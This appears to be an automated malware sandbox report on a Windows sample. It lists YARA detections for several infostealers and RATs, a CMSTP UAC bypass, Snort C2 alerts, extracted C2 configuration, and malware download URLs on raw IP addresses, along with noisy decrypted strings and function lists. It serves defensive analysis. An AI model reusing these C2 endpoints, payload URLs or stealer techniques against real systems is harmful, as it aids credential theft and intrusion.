1.2.u5g0.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u5g0.0.exe.2ed0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5g0.0.exe.2ed0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811f449f0.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811f449f0.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5d600c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.cmd.exe.52f2e64.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.52f2e64.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
2.2.run.exe.425dd5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.425dd5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.52ae976.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.52ae976.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a850000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1f5962:$s1: file:/// 0x1f5872:$s2: {11111-22222-10009-11112} 0x1f58f2:$s3: {11111-22222-50001-00000} 0x8177c:$s4: get_Module 0xe7db1:$s4: get_Module 0x1f3b25:$s4: get_Module 0xe9204:$s5: Reverse 0x1f3e0b:$s5: Reverse 0x8da95:$s6: BlockCopy 0x212279:$s6: BlockCopy 0x83c60:$s7: ReadByte 0x1f5974:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.0.u5g0.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 81 entries

Snort Signatures

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/25/24-12:16:10.180353
SID:	2044243
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/25/24-12:16:10.669378
SID:	2044244
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/25/24-12:16:03.873014
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/25/24-12:16:10.991630
SID:	2051828
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	Avira URL Cloud: Label: malware
Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware
Source: http://91.215.85.66:9000	Avira URL Cloud: Label: malware
Source: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08F	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\qbji	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u5g0.0.exe.5408.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.228/BroomSetup.exe	Virustotal: Detection: 22%	Perma Link
Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll	Virustotal: Detection: 8%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 13%	Perma Link
Source: http://185.172.128.76	Virustotal: Detection: 9%	Perma Link
Source: 185.172.128.76/3cd2b41cbde8fc9c.php	Virustotal: Detection: 13%	Perma Link
Source: http://185.172.128.59/syncUpd.exe	Virustotal: Detection: 22%	Perma Link
Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	Virustotal: Detection: 20%	Perma Link
Source: http://185.172.128.203/tiktok.exe	Virustotal: Detection: 19%	Perma Link
Source: http://185.172.128.203/tiktok.exe00	Virustotal: Detection: 15%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.phpQ	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.76/3cd2b41cbde8fc9c.phpX	Virustotal: Detection: 6%	Perma Link
Source: http://91.215.85.66:9000	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\qbji	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: R0hb7jyBcv.exe	Virustotal: Detection: 36%			Perma Link
Source: R0hb7jyBcv.exe	ReversingLabs: Detection: 32%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qbji	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: R0hb7jyBcv.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: /#%33@@@
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: @@@@<@@@
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/\|
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: %s\%V/yVs
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: %s\*.
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: }567y9n/S
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: ntTekeny
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: ging
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: PassMord0
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: J@@@`z`@J@@@J@@@
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: OPQRSTUVWXY
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: 456753+/---- '
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: '--- '
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: 6~uxpS
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: idf7
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: v\|wiJB
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: r\|yTw
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: q_yclEGL\|9FMupzgjYeo'
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: kxwY
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: brir/Coa`wD9
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: vv\|`i~
Source: 1.2.u5g0.0.exe.400000.0.raw.unpack	String decryptor: login:

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB43B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6BCB43B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	1_2_6BCE0180
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6BCDA730
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6BCBA650
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC98670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6BC98670
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6BD025B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB44C0 PK11_PubEncrypt,	1_2_6BCB44C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB4440 PK11_PrivDecrypt,	1_2_6BCB4440
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6BC84420
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDDA40 SEC_PKCS7ContentIsEncrypted,	1_2_6BCDDA40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	1_2_6BCB9840
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	1_2_6BCB3850
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB3FF0 PK11_PrivDecryptPKCS1,	1_2_6BCB3FF0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	1_2_6BCD9EC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	1_2_6BC97D60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	1_2_6BCDBD30
